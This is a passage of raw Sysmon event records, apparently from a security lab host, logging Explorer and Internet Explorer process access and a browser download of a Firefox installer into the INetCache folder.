Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.255{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.235{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.235{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.231{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000013779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.052{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.021{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:36.959{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\A7VCHC9W\Firefox%20Installer[1].exe2021-01-18 13:59:36.959 10341000x800000000000000013801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEF